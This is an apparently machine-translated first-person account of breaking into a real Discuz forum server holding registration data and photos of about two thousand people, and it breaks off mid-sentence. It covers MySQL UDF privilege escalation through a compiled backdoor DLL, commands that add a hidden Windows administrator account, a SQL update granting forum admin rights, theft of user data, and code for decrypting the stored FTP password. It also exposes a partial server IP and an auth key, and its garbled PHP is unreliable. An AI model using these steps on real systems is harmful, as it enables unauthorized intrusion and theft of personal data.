Non-tool ideas from Discuz to remote FTP party decryption penetration

First, I am based on the achievements of my predecessors. Briefly describe the server situation.
The target is the registration information and photo server of two thousand people. The website server and the photo storage server are both independent servers, but the permission settings are very strict. Although there is no disabled php function, the execution command does not display back, you cannot obtain the website directory file information (you can obtain the list of some sub-directory files and read some sub-directory files ). The website server construction environment is Windows + IIS6 + php + MySql + discuz forum and discuz Forum attachment (that is, the photo target) stored on another Windows + IIS6 + serv-u + asp server. On the server where the website is located, the MySql database prohibits the use of show and other columns of Database lists, but file_priv is enabled, which can be load_file or into outfile.
Step 1: Obtain the webshell of the website on the same server of the discuz forum. I will not talk about the steps. As a result, there is no technical content. After seeing the source file on the same server website, I found that the seemingly powerful program, vulnerabilities such as fck, dashboard brute force cracking, uninitialized global POST variables, and seemingly existing MySql injection can be used... Secondly, I won't win this webshell, so I won't write the process.
Step 2: Obtain the server permissions. A dll Trojan backdoor for udf elevation is compiled through open source on the Internet. After the dll file is encoded (linux is easier to operate), it is archived, create a user-defined function (this is a lot of online tutorials, and many of webshells have already integrated the ready-made MySql udf Privilege Escalation Module). This is not much to talk about.
Okay. Start the text.
Step 3 officially started.
As mentioned above, the website server cannot read the Home Directory of the website. It can only list and read the file list of some subdirectories and cannot edit the content. It is difficult to find a directory. Google searches for keywords:
Site: website. com inurl:. php
Copy code
In this way, you only need to directly read the content of this file in webshell, or use the injection point to perform the load_file operation to read the content. Fortunately, the include folder can read files. In this way, the MySql account and password are obtained.
As mentioned above, MySql cannot directly list databases and table segments through show, but the website does not support executing commands and column directories, Which is troublesome.
However, since the system is Windows, I think of udf privilege escalation.
Create a user-defined function according to the online steps and export udf. dll (into outfile operation) to the system32 directory. the mysql. func table is as follows:
Name: 6a756c696574
Ret: 0
Dl: 6d7973716c446c6c2e646c6c
Type: function

* Note: it is a hexadecimal system. After conversion, the function name is juliet. The dll file name is mysqlDll. dll (this file is compiled in advance and exported through the into outfile operation)
In this way, I only need to execute:
Juliet ("net user ")
Copy code
You can run the cmd command, which is placed in the middle of the "" quotation mark.
A busy schedule
Juliet ("net user ")
Juliet ("net user mysql/add ")
Juliet ("net localgroup administrators mysql/add ")
Juliet ("query user ")
Juliet ("logoff 2 ")
Copy code
I logged on to the server.

After I arrived at the server, I found that the attachment was not on the server at all. I am not familiar with MySql command line. However, I can see the Database Name of the discuz Forum, named aaa.
Well, I have returned to the ancient webshell era. Go to webshell to execute MySql commands.
First register an account at the discuz Forum, remember to set uid to 215872, and then execute:
UPDATE aaa. cdb_members SET adminid = 1 WHERE uid = 215872
Copy code
Add yourself to the discuz administrator list.
I came in from the Forum Management Center and found that the attachment was 170 GB, but it was on a remote ftp server, which made me very depressed...

Okay, I backed up the user data and got the first data I wanted.

The second data is the discuz remote attachment Server ftp settings cracking.
As for how to obtain the remote ftp, many people say, find it from the configuration file. But I found it, but it does not exist in the configuration file. I can see from the background that the ftp host is set to 61.160.220. *. I searched the content on the server without any related results .. Obviously not in the configuration file.

 

In the background configuration of the discuz forum, the remote Ftp attachment server is completely encrypted. The password setting box only displays the first and last digits of the password, no matter how long the ftp password is, there will always be eight in the middle *. Right-click to view the source code of the webpage on the settings page and check whether the ftp password box is in the format of text, password, and value *. It seems that the data already exists in the database.
The url of the remote attachment setting page in the background is
/Admincp. php? Action = settings & operation = attach

I read the contents of the settings. inc. php file in the admin directory and click "Search for the attach character. Get the following code:
Elseif ($ operation = attach ){
$ Anchor = in_array ($ anchor, array (basic, image, remote, antileech ))? $ Anchor: basic;
Showsubmenuanchors (settings_attach, array (
Array (settings_attach_basic, basic, $ anchor = basic ),
Array (settings_attach_image, image, $ anchor = image ),
$ Isfounder? Array (settings_attach_remote, remote, $ anchor = remote ):,
Array (settings_attach_antileech, antileech, $ anchor = antileech ),
));
Copy code
Add the code starting with this file:
$ Settings = array ();
$ Query = $ db-> query ("SELECT * FROM {$ tablepre} settings ");
Copy code
I flipped through the cdb_settings table and found the ftp settings.
The content of cdb_settings.ftp is as follows:
A: 15: {s: 2: "on"; s: 1: "1"; s: 3: "ssl"; s: 1: "0"; s: 4: "host"; s: 13: "61.160.220. * "; s: 4:" port "; s: 2:" 21 "; s: 8:" username ";

S: 12: "XXXX"; s: 8: "password"; s: 55: "3a21S + rVfCmuxzYWRk2Fos5w0viyh/CvuO78YfVMlK2Gmu1UZ2Xi

VVk "; s: 4:" pasv "; s: 1:" 1 "; s: 9:" attachdir "; s: 17 :". /web/attachments "; s: 9:" attachurl "; s: 41:

"Http://photo.XXXXXXX.cn/"; s: 7: "timeout"; s: 1: "0"; s: 6: "mirror"; s: 1: "1"; s: 11: "allowedexts"; s: 25: "jpg
Gif
Rar
Tar

Zip
"; S: 14:" disallowedexts "; s: 14:" exe
Txt
Word "; s: 7:" minsize "; s: 1:" 0 "; s: 7:" hideurl "; s: 1:" 0 ";}
Copy code
Obviously, from the background configuration, we can see that the ftp password is not 3a21S + rVfCmuxzYWRk2Fos5w0viyh/CvuO78YfVMlK2Gmu1UZ2XiVVk. This is encrypted.

 

The first thought I got based on the password length is that base64 decryption. But the decoded result is:
|) 6FM ge?
Copy code
All are garbled characters... There must be something else. I found the encryption and decryption function in the global directory of include. I constructed a decryption page myself:
<? Php
$ Aaa = 206crkvkfJEsv1jO5e3CIJugXciKyQ0B/JykVCk4YmNBbURJSy0mceI; // The encrypted ftp Password
$ Operation = DECODE; // set it to the decryption mode?
Function authcode ($ string, $ operation, $ key = ){
$ Key = md5 ($ key? $ Key: $ GLOBALS [discuz_auth_key]);
$ Key_length = strlen ($ key );
$ String = $ operation = DECODE? Base64_decode ($ string): substr (md5 ($ string. $ key), 0, 8). $ string;
$ String_length = strlen ($ string );
$ Rndkey = $ box = array ();
$ Result =;
For ($ I = 0; $ I <= 255; $ I ++ ){
$ Rndkey [$ I] = ord ($ key [$ I % $ key_length]);
$ Box [$ I] = $ I;
}
For ($ j = $ I = 0; I I <256; $ I ++ ){
$ J = ($ j + $ box [$ I] + $ rndkey [$ I]) % 256;
$ Tmp = $ box [$ I];
$ Box [$ I] = $ box [$ j];
$ Box [$ j] = $ tmp;
}
For ($ a = $ j = $ I = 0; $ I <$ string_length; $ I ++ ){
$ A = ($ a + 1) % 256;
$ J = ($ j + $ box [$ a]) % 256;
$ Tmp = $ box [$ a];
$ Box [$ a] = $ box [$ j];
$ Box [$ j] = $ tmp;
$ Result. = chr (ord ($ string [$ I]) ^ ($ box [($ box [$ a] + $ box [$ j]) % 256]);
}
If ($ operation = DECODE ){
If (substr ($ result, 0, 8) = substr (md5 (substr ($ result, 8). $ key), 0, 8 )){
Return substr ($ result, 8 );
} Else {
Return;
}
} Else {
Return str_replace (=, base64_encode ($ result ));
}
}
$ Aaa = base64_decode ($ aaa); // decrypt the ciphertext
Echo $ aaa; // output the decrypted content
?>
Copy code
As a result, the base64 decrypted content is output directly to me ....

 

It seems that this is easy to decrypt, and it is unlikely. After carefully reading the source code, it seems that an auth_key is missing. There is indeed an authkey content in the database settings. The content is 99dc6cae3cN9t4R4. After it is added, it is still wrong. Nothing is output this time... I searched the file whose source code contains discuz_auth_key again and studied it. It is really complicated .. I want to start from another path. Don't get stuck and try again.

 

Later, I thought that I could start from the background display and let the background directly display the decrypted content, so I don't need to add any asterisks. Yes.

 

Compare the code in the settings. inc. php file, and finally lock it on the checktools. inc. php file.

 

The code for adding an asterisk to a password mask is as follows:
If (! Empty ($ settingsnew [ftp] [password]) {
$ Settings [ftp] = unserialize ($ db-> result_first ("SELECT value FROM {$ tablepre} settings WHERE variable = ftp "));
$ Settings [ftp] [password] = authcode ($ settings [ftp] [password], DECODE, md5 ($ authkey ));
$ Pwlen = strlen ($ settingsnew [ftp] [password]);
If ($ settingsnew [ftp] [password] {0 }==$ settings [ftp] [password] {0} & $ settingsnew [ftp] [password] {$ pwlen- 1 }== $ settings [ftp] [password] {strlen ($ settings [ftp] [password]) -1} & substr ($ settingsnew [ftp] [password], 1, $ pwlen-2) = ********){
$ Settingsnew [ftp] [password] = $ settings [ftp] [password];
}
}
Copy code
I suddenly realized that the original decryption code was